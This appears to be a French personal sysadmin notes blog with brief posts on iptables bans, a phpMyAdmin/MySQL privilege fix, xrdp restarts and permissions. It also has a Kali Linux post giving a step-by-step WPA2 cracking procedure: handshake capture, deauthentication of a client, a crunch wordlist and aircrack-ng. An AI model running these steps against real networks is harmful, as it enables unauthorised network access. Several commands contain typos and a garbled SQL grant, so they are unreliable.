IPTABLE BAN IP IPTABLE BAN IP published on 9 avril 2020Read more posts by the author of IPTABLE BAN IP, GillesAucun commentaire sur IPTABLE BAN IP IPTABLE BAN Bannir une IP :iptables -I INPUT -s x.x.x.x -j DROP Lister les IP bloquées :iptables -L INPUT -v -n | grep DROP
PhpMyAdmin PhpMyAdmin published on 9 janvier 2020Read more posts by the author of PhpMyAdmin, GillesAucun commentaire sur PhpMyAdmin Phpmyadmin : #1698 - Access denied for user 'root'@'localhost' En ligne de commande :mysql -u root -p CREATE USER ‘pmauser@’localhost’ IDENTIFIED BY ‘mot_de_passe’; GRANT ALL ON *.* TO 'pmauser'@'localhost'; ?? IDENTIFIED BY 'mot_de_passe_solide' WITH GRANT OPTION; ?? FLUSH PRIVILEGES; QUIT;
Kali linux Kali linux published on 20 décembre 2019Read more posts by the author of Kali linux, GillesAucun commentaire sur Kali linux Mettre carte wifi en mode moniteur :airmon-ng start wla0Recherche réseau :airodump-ng –encrypt wpa2(par exemple) wlan0monRécupérer adresse MAC du PA (par exemple 01:01:01:01:01:01)Recherche ciblé sur wifi cible :airodump-ng -c(channel du wifi) –bssid(adresse MAC du PA récupérée) -w(sauvegarde du handshake sur le disque) wlan0monRécupérer MAC de la station (par exemple 02:02:02:02:02:02)Par exemple :airodump-ng -c 3 –bssid 01:01:01:01:01:01 -w /root/handshakewifiEnsuite déco-reco :aireplay-ng -0 200(+ ou -) – a (MAC du PA) -c (MAC de la station) wlan0monPar exemple :aireplay-ng -0 200 -a 01:01:01:01:01:01 -c 02:02:02:02:02:02 wlan0monRécupérer le handshake dans la console du “airodump-ng -c 3 ………”Génération avec crunch:crunch (nbr mini. caratères) (nbr max. caratères) (contenu éventuel) -o(sauvegarde du fichier généré) et ENTREex : crunch 8 10 012345678 -o /root/crunchwifi.txtaircrack-ng -a2 -b MAC PA -w (fichier crunch) (fichier hanshake)ex: airecrack -a2 -b 01:01:01:01:01:01 -w /root/crunchwifi.txt /root/handshakewifi.cap
XRDP Cannot create session: Already running in a session XRDP Cannot create session: Already running in a session published on 24 avril 2019Read more posts by the author of XRDP Cannot create session: Already running in a session, GillesAucun commentaire sur XRDP Cannot create session: Already running in a session XRDP Cannot create session: Already running in a session Service xrdp stopservice xrdp startPour vérifier : service srdp status
Droits Droits published on 22 mars 2018Read more posts by the author of Droits, GillesAucun commentaire sur Droits R755 F644